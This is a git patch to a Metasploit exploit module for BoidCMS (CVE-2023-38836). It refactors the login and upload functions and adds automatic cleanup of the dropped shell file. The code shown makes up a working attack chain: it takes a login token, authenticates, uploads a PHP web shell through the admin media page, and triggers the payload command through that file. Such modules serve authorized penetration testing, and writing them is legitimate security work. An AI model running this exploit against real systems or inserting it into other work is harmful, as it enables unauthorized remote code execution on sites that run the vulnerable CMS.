From 8a1f5de8f1dbdfc1933f5f30b447d4889b1a552e Mon Sep 17 00:00:00 2001
From: bwatters <bwatters@rapid7.com>
Date: Thu, 15 Feb 2024 10:00:44 -0600
Subject: [PATCH] Fix msftidy issue and update file delete

---
 .../multi/http/cve_2023_38836_boidcms.rb      | 46 ++++++++-----------
 1 file changed, 18 insertions(+), 28 deletions(-)

diff --git a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
index 681580d4c9..b270e29086 100644
--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -60,6 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     ])
     @token = nil
+    @shell_filename = nil
   end
 
   def check
@@ -97,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @token = extract_token(res)
   end
 
-  def cms_login(login_token)
+  def cms_login?(login_token)
     vprint_status('Logging into CMS')
     cms_password = datastore['CMS_PASSWORD']
     cms_username = datastore['CMS_USERNAME']
@@ -126,16 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_form_data' => vars_form_data
     )
-    if res && res.code == 302
-      return true
-    else
-      return false
-    end
+    res && res.code == 302
   end
 
-  def upload_php(login_token, shell_filename)
+  def upload_php?(login_token, shell_filename)
     vprint_status("Uploading PHP file #{shell_filename}")
-
     vars_form_data =
       [
         {
@@ -154,20 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
+      'uri' => normalize_uri(target_uri.path, 'admin'),
       'method' => 'POST',
       'keep_cookies' => true,
+      'vars_get' => {
+        'page' => 'media'
+      },
       'vars_form_data' => vars_form_data
     )
-    if res && res.code == 302
-      return true
-    else
-      return false
-    end
+    res && res.code == 302
   end
 
   def launch_payload(shell_filename, payload_cmd)
-    # retrieve output
+    # send the command to the php page
     vprint_status('launching Payload')
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
@@ -180,25 +176,19 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_new_session(session)
-    super
-    vprint_status("Attempting to delete #{@shell_filename}")
-    if session.type == 'meterpreter'
-      session.fs.file.rm(@shell_filename)
-    else
-      print_warning("Failed to automatically delete #{@shell_filename}")
-    end
-  end
-
   def exploit
     payload_cmd = payload.encoded
     @shell_filename = datastore['PHP_FILENAME']
     login_token = cms_token
 
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
-    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login(login_token)
-    fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php(login_token, @shell_filename)
-    launch_payload(@shell_filename, payload_cmd)
+    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
+    if upload_php?(login_token, @shell_filename)
+      register_file_for_cleanup @shell_filename
+      launch_payload(@shell_filename, payload_cmd)
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
+    end
   end
 
 end